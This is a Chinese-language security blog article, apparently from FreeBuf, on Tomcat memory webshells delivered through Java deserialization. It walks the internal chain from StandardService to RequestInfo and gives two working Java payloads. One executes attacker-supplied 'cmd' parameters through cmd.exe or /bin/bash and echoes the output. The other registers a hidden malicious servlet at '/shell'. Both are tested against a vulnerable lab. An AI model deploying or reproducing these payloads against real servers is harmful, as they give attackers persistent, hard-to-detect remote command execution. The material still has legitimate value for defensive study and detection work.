前言
對于回顯的獲取主要是在ApplicationFilterChain?類的lastServicedRequest / lastServicedResponse?兩個屬性,是使用的ThreadLocal進(jìn)行修飾的,并且,在執(zhí)行請求的過程中,通過反射修改屬性值,能夠記錄下當(dāng)前線程的request對象的值。
之后在反序列化利用過程中方便利用ThreadLocal取出對應(yīng)的request進(jìn)行內(nèi)存馬的注入關(guān)鍵步驟。
這里轉(zhuǎn)而通過尋找全局存儲的request / response進(jìn)行內(nèi)存馬的注入操作。
正文
如何獲取的回顯
師傅通過這種方式關(guān)注到了org.apache.coyote.AbstractProcessor?類中,存在有兩個屬性值名為request / response?分別是使用final?修飾的org.apache.coyote.Request / org.apache.coyote.Response類型的變量。
我們的目標(biāo)是注入一個內(nèi)存馬,這里以上篇一樣的Servlet內(nèi)存馬舉例說明。
對于Servlet內(nèi)存馬,我們需要獲取到對應(yīng)ServletContext?,但是在org.apache.coyote.Request?類中,并沒有直接可以獲取的方法存在,我們可以關(guān)注到該類的setNote方法的實(shí)現(xiàn)。
這個方法是用來存放私有數(shù)據(jù)的,在其中舉了一個例子,其中描述了對于該類的notes?數(shù)組中的下標(biāo)為1的位置是用來存放的HttpServletRequest?對象的,值得注意的是其中的0-8序號存放的是servlet Container?中的數(shù)據(jù),9-16序號存放的是connector這個組件的數(shù)據(jù)。
因?yàn)橹灰@取到了HttpServletRequest?對象,也就能夠調(diào)用getServletContext方法獲取我們需要的上下文。
我們可以通過getNote(1)來獲取,
好了,言歸正傳,轉(zhuǎn)到獲取request對象,
在一個Controller調(diào)用過程中,其中的Http11Processor?類是繼承了AbstractProcessor這個類的。
所以我們只需要獲取到Http11Processor類對象,我們就能夠成功獲取到我們需要的request對象
目標(biāo)放在調(diào)用Http11Processor之前是否對該對象進(jìn)行持久化存儲,或者直接點(diǎn)對其中的request對象進(jìn)行了持久化存儲
我們進(jìn)而關(guān)注到了AbstractProtocol$ConnectionHandler?類中,在調(diào)用process?方法的過程中調(diào)用了register方法對processor對象進(jìn)行了存儲。
傳入的是processor,他到底是什么,我們可以追溯到該方法的開頭,存在有來源。
我們可以知道,這個processor對象是獲取的是當(dāng)前的Http11Processor對象,
對于register方法,我們可以跟進(jìn)一下。
首先從processor中獲取了RequestInfo?對象的信息之后調(diào)用了setGlobalProcessor方法。
調(diào)用了addRequestProcessor方法進(jìn)行添加。
也即是,將其添加進(jìn)入了processors這個List對象中,
所以現(xiàn)在我們的目的是獲取到AbstractProtocol$ConnectionHandler?類的global?屬性值,也即是獲取到AbstractProtocol這個類對象。
在調(diào)用這一步之后看起,發(fā)現(xiàn)了在CoyoteAdapter#service?方法中,存在有Connector對象的操作。
對于Connector對象
這是一個connector組件的一個實(shí)現(xiàn),
其中存在有一個protocolHandler?屬性,是一個ProtocolHandler類對象。
前面我們需要獲取的是AbstractProtocol類對象,同樣是實(shí)現(xiàn)了這個接口,
而且于HTTP連接相關(guān)的類都實(shí)現(xiàn)了這個接口的,
所以我們能夠從該屬性中獲取到我們需要的AbstractProtocol對象值,
現(xiàn)在我們需要獲取的對象就是一個Connector對象,
而對于連接器的創(chuàng)建,在tomcat容器進(jìn)行啟動的時候,將會調(diào)用setConnector?方法將connector放在service中去,也即是StandardService類對象。
對于StandardService的獲取,我們可以直接從當(dāng)前線程中進(jìn)行獲取。
這樣,一條鏈子進(jìn)行成了
總結(jié)一下:
StandardService?==>connector?==>Connector.protocolHandler?==>Http11NioProtocol.handler?==>AbstractProtocol$ConnectionHandler.global?==>RequestGroupInfo.processors?==>RequestInfo.req
構(gòu)造回顯內(nèi)存馬
非持久化
這種應(yīng)該也不算是內(nèi)存馬吧,也就是每次發(fā)送發(fā)序列化數(shù)據(jù)的時候,通過利用獲取的request / response進(jìn)行命令執(zhí)行和回顯。
對于實(shí)驗(yàn)的環(huán)境同樣使用的是前面一樣的環(huán)境 -- 使用springboot搭建的環(huán)境,
我首先創(chuàng)建了一個getField方法方便獲取屬性值。
將具體邏輯放在了static代碼塊中。
值得注意的有兩點(diǎn)
在進(jìn)行connector的篩選中,調(diào)用了getScheme().toLowerCase().contains("http")方法來帥選和http相關(guān)的連接器。
在命令執(zhí)行的位置,通過判斷有無特征來決定是否執(zhí)行命令。
完整的實(shí)現(xiàn)
// 從線程中獲取類加載器WebappClassLoaderBase
WebappClassLoaderBase contextClassLoader = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
// 獲取TomcatEmbeddedContext對象
Context context = contextClassLoader.getResources().getContext();
// 從上下文中獲取ApplicationContext對象
ApplicationContext applicationContext = (ApplicationContext) getField(context, Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("context"));
// 從Application中獲取StandardService對象
StandardService standardService = (StandardService) getField(applicationContext, Class.forName("org.apache.catalina.core.ApplicationContext").getDeclaredField("service"));
// 從StandardService中獲取Connector數(shù)組
Connector[] connectors = standardService.findConnectors();
for (Connector connector : connectors) {
if (connector.getScheme().toLowerCase().contains("http")) {
// 獲取Connector對象的protocolHandler屬性值
ProtocolHandler protocolHandler = connector.getProtocolHandler();
// 篩選我們需要的Abstract
if (protocolHandler instanceof AbstractProtocol) {
// 從Http11NioProtocol對象中獲取到handler屬性,也即是AbstractProtocol中的handler屬性,存在有一個getHandler方法可以直接返回
// 反射獲取該方法
Method getHandler = Class.forName("org.apache.coyote.AbstractProtocol").getDeclaredMethod("getHandler");
getHandler.setAccessible(true);
AbstractEndpoint.Handler handler = (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler);
// 從上面獲取的handler中取出global屬性值
RequestGroupInfo global = (RequestGroupInfo) getField(handler, Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global"));
// 之后從上面獲取的RequestGroupInfo對象中獲取到processors這個List對象,元素是RequestInfo對象
ArrayList processors = (ArrayList) getField(global, Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"));
// 遍歷List中的元素
for (Object processor : processors) {
RequestInfo requestInfo = (RequestInfo) processor;
// 獲取對應(yīng)的Request對象
org.apache.coyote.Request req = (org.apache.coyote.Request) getField(requestInfo, Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"));
// 通過不同的請求進(jìn)行處理
if ((req.queryString()).toString().toLowerCase().contains("cmd")) {
// 獲取對應(yīng)的Request對象
org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) req.getNote(1);
// 執(zhí)行希望執(zhí)行的命令
String cmd = request.getParameter("cmd");
String[] cmds = null;
if (cmd != null) {
if (System.getProperty("os.name").toLowerCase().contains("win")) {
cmds = new String[] {"cmd.exe", "/c", cmd};
} else {
cmds = new String[] {"/bin/bash", "-c", cmd};
}
java.util.Scanner c = new java.util.Scanner(new ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A");
String o = null;
o = c.hasNext() ? c.next() : o;
c.close();
PrintWriter writer = request.getResponse().getWriter();
writer.println(o);
writer.flush();
writer.close();
}
}
測試一下
首先通過CC6_plus生成序列化數(shù)據(jù)1.ser
發(fā)送給漏洞端。
在訪問路由中添加了一個cmd的GET傳參,最后能夠發(fā)現(xiàn),成功執(zhí)行了的。
持久化
對于持久化也就是真正的內(nèi)存馬實(shí)現(xiàn),主要是通過和前面的Tomcat Servlet內(nèi)存馬相結(jié)合的模式,
也即是從request對象中獲取到了ServletContext對象來執(zhí)行惡意邏輯。
完整實(shí)現(xiàn)
// 從線程中獲取類加載器WebappClassLoaderBase
WebappClassLoaderBase contextClassLoader = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
// 獲取TomcatEmbeddedContext對象
Context context = contextClassLoader.getResources().getContext();
// 從上下文中獲取ApplicationContext對象
ApplicationContext applicationContext = (ApplicationContext) getField(context, Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("context"));
// 從Application中獲取StandardService對象
StandardService standardService = (StandardService) getField(applicationContext, Class.forName("org.apache.catalina.core.ApplicationContext").getDeclaredField("service"));
// 從StandardService中獲取Connector數(shù)組
Connector[] connectors = standardService.findConnectors();
for (Connector connector : connectors) {
if (connector.getScheme().toLowerCase().contains("http")) {
// 獲取Connector對象的protocolHandler屬性值
ProtocolHandler protocolHandler = connector.getProtocolHandler();
// 篩選我們需要的Abstract
if (protocolHandler instanceof AbstractProtocol) {
// 從Http11NioProtocol對象中獲取到handler屬性,也即是AbstractProtocol中的handler屬性,存在有一個getHandler方法可以直接返回
// 反射獲取該方法
Method getHandler = Class.forName("org.apache.coyote.AbstractProtocol").getDeclaredMethod("getHandler");
getHandler.setAccessible(true);
AbstractEndpoint.Handler handler = (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler);
// 從上面獲取的handler中取出global屬性值
RequestGroupInfo global = (RequestGroupInfo) getField(handler, Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global"));
// 之后從上面獲取的RequestGroupInfo對象中獲取到processors這個List對象,元素是RequestInfo對象
ArrayList processors = (ArrayList) getField(global, Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"));
// 遍歷List中的元素
for (Object processor : processors) {
RequestInfo requestInfo = (RequestInfo) processor;
// 獲取對應(yīng)的Request對象
org.apache.coyote.Request req = (org.apache.coyote.Request) getField(requestInfo, Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"));
org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) req.getNote(1);
ServletContext servletContext = request.getServletContext();
String name = "xxx";
if (servletContext.getServletRegistration(name) == null) {
StandardContext o = null;
// 從 request 的 ServletContext 對象中循環(huán)判斷獲取 Tomcat StandardContext 對象
while (o == null) {
Field f = servletContext.getClass().getDeclaredField("context");
f.setAccessible(true);
Object object = f.get(servletContext);
if (object instanceof ServletContext) {
servletContext = (ServletContext) object;
} else if (object instanceof StandardContext) {
o = (StandardContext) object;
}
}
//自定義servlet
Servlet servlet = new TomcatMemshell1();
//用Wrapper封裝servlet
Wrapper newWrapper = o.createWrapper();
newWrapper.setName(name);
newWrapper.setLoadOnStartup(1);
newWrapper.setServlet(servlet);
//向children中添加Wrapper
o.addChild(newWrapper);
//添加servlet的映射
o.addServletMappingDecoded("/shell", name);
簡單測試一下,
啟動反序列漏洞環(huán)境,
發(fā)送序列化數(shù)據(jù),
成功進(jìn)行反序列化,
驗(yàn)證是否成功注入,
成功創(chuàng)建了一個惡意的Servlet。
Ref
https://github.com/Litch1-v/ysoserial/blob/master/src/main/java/ysoserial/payloads/util/Gadgets.java
https://xz.aliyun.com/t/7348
本文作者:superLeeH, 轉(zhuǎn)載請注明來自FreeBuf.COM
